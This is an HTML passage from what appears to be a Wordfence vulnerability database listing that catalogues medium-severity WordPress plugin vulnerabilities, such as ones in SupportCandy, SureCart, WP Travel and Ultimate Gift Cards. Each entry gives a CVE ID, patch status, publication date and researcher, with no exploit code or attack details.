<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3dcf2f22-4202-4902-9883-eb4479fe1028" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3e70126f-8869-4e17-99a1-5d5c8790229e" target="_blank" rel="noopener">Social Contact Form (FormyChat) &lt;= 2.15.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77773" target="_blank" rel="noopener noreferrer">							CVE-2026-77773						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-contact-form" target="_blank" rel="noopener">Contact Form to Chat Apps | Click to Chat to Order – FormyChat</a> <span class="wfvr-software-slug">[social-contact-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3e70126f-8869-4e17-99a1-5d5c8790229e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c183ba80-67d4-4fa9-bc5a-5ee14edb2305" target="_blank" rel="noopener">Sunshine Photo Cart &lt;= 3.6 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85037" target="_blank" rel="noopener noreferrer">							CVE-2026-85037						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sunshine-photo-cart" target="_blank" rel="noopener">Sunshine Photo Cart – Client Photo Gallery &amp; Photo Proofing for Photographers</a> <span class="wfvr-software-slug">[sunshine-photo-cart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c183ba80-67d4-4fa9-bc5a-5ee14edb2305" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6629349-996d-4873-ba01-c1374a1d0f8a" target="_blank" rel="noopener">SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent 3.2.9 &#8211; 3.5.2 &#8211; Unauthenticated Ticket Attachment Read</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81021" target="_blank" rel="noopener noreferrer">							CVE-2026-81021						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/supportcandy" target="_blank" rel="noopener">SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent</a> <span class="wfvr-software-slug">[supportcandy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6629349-996d-4873-ba01-c1374a1d0f8a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afdcc676-dcfa-4d88-b55f-72aa5ba0ed7c" target="_blank" rel="noopener">SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent 3.3.6 &#8211; 3.5.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81022" target="_blank" rel="noopener noreferrer">							CVE-2026-81022						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/supportcandy" target="_blank" rel="noopener">SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent</a> <span class="wfvr-software-slug">[supportcandy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitre-osman-hussein" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2dafc4d6717255667d167708bfc6f6bb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2dafc4d6717255667d167708bfc6f6bb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitre-osman-hussein" target="_blank" rel="noopener">Mitre Osman Hussein</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afdcc676-dcfa-4d88-b55f-72aa5ba0ed7c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/57e6a355-9bde-4a85-9556-6885530306dc" target="_blank" rel="noopener">SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, &amp; Payments &lt; 4.7.0 &#8211; Unauthorized WordPress Account Creation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75793" target="_blank" rel="noopener noreferrer">							CVE-2026-75793						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/surecart" target="_blank" rel="noopener">SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, &amp; Payments</a> <span class="wfvr-software-slug">[surecart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/57e6a355-9bde-4a85-9556-6885530306dc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a145ea3d-a367-4e42-8a47-cfea49634412" target="_blank" rel="noopener">SureRank SEO – Meta Tags, Social Preview, XML Sitemap, Schema &amp; Open Graph 1.6.2 &#8211; 1.10.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78152" target="_blank" rel="noopener noreferrer">							CVE-2026-78152						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/surerank" target="_blank" rel="noopener">SureRank SEO – Meta Tags, Social Preview, XML Sitemap, Schema &amp; Open Graph</a> <span class="wfvr-software-slug">[surerank]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a145ea3d-a367-4e42-8a47-cfea49634412" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8be18dd9-4d50-4693-aded-38b583190bd8" target="_blank" rel="noopener">Teddy Bear Customize Addon &lt;= 1.0.5 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14562" target="_blank" rel="noopener noreferrer">							CVE-2026-14562						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/teddy-bear-customize-addon" target="_blank" rel="noopener">Teddy Bear Customize Addon</a> <span class="wfvr-software-slug">[teddy-bear-customize-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8be18dd9-4d50-4693-aded-38b583190bd8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe695bd6-17c4-457b-a423-aa41b14379cf" target="_blank" rel="noopener">Thanko Thank You Page Customizer for WooCommerce – Increase Your Sales &lt;= 1.2.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81786" target="_blank" rel="noopener noreferrer">							CVE-2026-81786						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-thank-you-page-customizer" target="_blank" rel="noopener">Thanko Thank You Page Customizer for WooCommerce – Increase Your Sales</a> <span class="wfvr-software-slug">[woo-thank-you-page-customizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tony-harris" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5234641298b9f3014d010ae4f0f01075.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5234641298b9f3014d010ae4f0f01075"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tony-harris" target="_blank" rel="noopener">Tony Harris</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe695bd6-17c4-457b-a423-aa41b14379cf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0324b2d0-9755-4079-b162-40e519bf462a" target="_blank" rel="noopener">Travel &lt;= 12.0.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18042" target="_blank" rel="noopener noreferrer">							CVE-2026-18042						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine</a> <span class="wfvr-software-slug">[wp-travel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0324b2d0-9755-4079-b162-40e519bf462a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6f82cab3-f548-4f23-843b-3cbb29313caf" target="_blank" rel="noopener">Travel &lt;= 12.0.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13144" target="_blank" rel="noopener noreferrer">							CVE-2026-13144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine</a> <span class="wfvr-software-slug">[wp-travel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6f82cab3-f548-4f23-843b-3cbb29313caf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b765a5b2-268a-4dcd-9290-274e28c02830" target="_blank" rel="noopener">Travel &lt;= 12.0.1 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13146" target="_blank" rel="noopener noreferrer">							CVE-2026-13146						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">WP Travel – Ultimate Travel Booking System, Tour Management Engine</a> <span class="wfvr-software-slug">[wp-travel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b765a5b2-268a-4dcd-9290-274e28c02830" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b4851eb-ccb7-43ad-b83d-02ad2e20ddd4" target="_blank" rel="noopener">Ultimate Gift Cards for WooCommerce &lt; 3.2.10 &#8211;  Unauthenticated Inflated Gift Card Credit Acquisition</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19436" target="_blank" rel="noopener noreferrer">							CVE-2026-19436						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gift-cards-lite" target="_blank" rel="noopener">Ultimate Gift Cards for WooCommerce</a> <span class="wfvr-software-slug">[woo-gift-cards-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/guillermo-alvarez-fernandez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2da91845a89d34ab2895d3fb12f4464f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2da91845a89d34ab2895d3fb12f4464f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/guillermo-alvarez-fernandez" target="_blank" rel="noopener">Guillermo Álvarez Fernández</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b4851eb-ccb7-43ad-b83d-02ad2e20ddd4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15caa471-91a9-421b-83df-1be31bbc6ffb" target="_blank" rel="noopener">Ultimate Gift Cards for WooCommerce 3.0.3 &#8211; 3.2.9 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19439" target="_blank" rel="noopener noreferrer">							CVE-2026-19439						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gift-cards-lite" target="_blank" rel="noopener">Ultimate Gift Cards for WooCommerce</a> <span class="wfvr-software-slug">[woo-gift-cards-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15caa471-91a9-421b-83df-1be31bbc6ffb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ccbf971e-9181-4a0c-88a4-efe8634c7b5c" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder 5.0 &#8211; 5.2.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86407" target="_blank" rel="noopener noreferrer">							CVE-2026-86407						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
